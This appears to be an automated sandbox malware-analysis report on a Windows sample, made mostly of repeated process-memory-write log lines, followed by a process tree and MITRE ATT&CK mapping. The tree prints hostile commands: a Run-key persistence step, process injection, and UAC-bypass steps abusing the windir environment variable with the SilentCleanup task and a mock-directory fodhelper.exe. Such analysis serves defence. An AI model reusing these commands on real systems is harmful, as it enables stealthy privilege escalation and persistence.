PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3888 wrote to memory of 3836	3888	de2ebb27023e08b71d091c7695c59192.exe	67
PID 3836 wrote to memory of 3864	3836	TapiUnattend.exe	71
PID 3836 wrote to memory of 3864	3836	TapiUnattend.exe	71
PID 3836 wrote to memory of 3864	3836	TapiUnattend.exe	71
PID 3888 wrote to memory of 3912	3888	de2ebb27023e08b71d091c7695c59192.exe	72
PID 3888 wrote to memory of 3912	3888	de2ebb27023e08b71d091c7695c59192.exe	72
PID 3888 wrote to memory of 3912	3888	de2ebb27023e08b71d091c7695c59192.exe	72
PID 3888 wrote to memory of 3912	3888	de2ebb27023e08b71d091c7695c59192.exe	72
PID 3888 wrote to memory of 3912	3888	de2ebb27023e08b71d091c7695c59192.exe	72
PID 3888 wrote to memory of 3912	3888	de2ebb27023e08b71d091c7695c59192.exe	72
PID 3888 wrote to memory of 3912	3888	de2ebb27023e08b71d091c7695c59192.exe	72
PID 3888 wrote to memory of 3912	3888	de2ebb27023e08b71d091c7695c59192.exe	72
PID 3888 wrote to memory of 3912	3888	de2ebb27023e08b71d091c7695c59192.exe	72
PID 3888 wrote to memory of 3912	3888	de2ebb27023e08b71d091c7695c59192.exe	72
PID 3888 wrote to memory of 3912	3888	de2ebb27023e08b71d091c7695c59192.exe	72
PID 3888 wrote to memory of 3912	3888	de2ebb27023e08b71d091c7695c59192.exe	72
PID 3888 wrote to memory of 3912	3888	de2ebb27023e08b71d091c7695c59192.exe	72
PID 3888 wrote to memory of 3912	3888	de2ebb27023e08b71d091c7695c59192.exe	72
PID 3888 wrote to memory of 3912	3888	de2ebb27023e08b71d091c7695c59192.exe	72
PID 3864 wrote to memory of 856	3864	cmd.exe	74
PID 3864 wrote to memory of 856	3864	cmd.exe	74
PID 3864 wrote to memory of 856	3864	cmd.exe	74
PID 3864 wrote to memory of 3328	3864	cmd.exe	75
PID 3864 wrote to memory of 3328	3864	cmd.exe	75
PID 3864 wrote to memory of 3328	3864	cmd.exe	75
PID 3836 wrote to memory of 2764	3836	TapiUnattend.exe	76
PID 3836 wrote to memory of 2764	3836	TapiUnattend.exe	76
PID 3836 wrote to memory of 2764	3836	TapiUnattend.exe	76
PID 3864 wrote to memory of 3104	3864	cmd.exe	78
PID 3864 wrote to memory of 3104	3864	cmd.exe	78
PID 3864 wrote to memory of 3104	3864	cmd.exe	78
PID 2764 wrote to memory of 2960	2764	cmd.exe	79
PID 2764 wrote to memory of 2960	2764	cmd.exe	79
PID 2960 wrote to memory of 1196	2960	fodhelper.exe	80
PID 2960 wrote to memory of 1196	2960	fodhelper.exe	80
PID 3864 wrote to memory of 2488	3864	cmd.exe	81
PID 3864 wrote to memory of 2488	3864	cmd.exe	81
PID 3864 wrote to memory of 2488	3864	cmd.exe	81

C:\Users\Admin\AppData\Local\Temp\de2ebb27023e08b71d091c7695c59192.exe
"C:\Users\Admin\AppData\Local\Temp\de2ebb27023e08b71d091c7695c59192.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3888
- C:\Windows\SysWOW64\TapiUnattend.exe
  "C:\Windows\System32\TapiUnattend.exe"
  2⤵
  PID:3836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
    3⤵
    PID:3864
  - - C:\Windows\SysWOW64\reg.exe
      reg delete hkcu\Environment /v windir /f
      4⤵
      Modifies registry key
      PID:856
  - - C:\Windows\SysWOW64\reg.exe
      reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
      4⤵
      Modifies registry key
      PID:3328
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
      4⤵
      PID:3104
  - - C:\Windows\SysWOW64\reg.exe
      reg delete hkcu\Environment /v windir /f
      4⤵
      Modifies registry key
      PID:2488
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Public\Runex.bat
    3⤵
    PID:2764
  - - C:\Windows \System32\fodhelper.exe
      "C:\Windows \System32\fodhelper.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2960
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Users\Public\x.bat
        5⤵
        
        PID:1196
- C:\Program Files (x86)\internet explorer\ieinstal.exe
  "C:\Program Files (x86)\internet explorer\ieinstal.exe"
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:3912

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

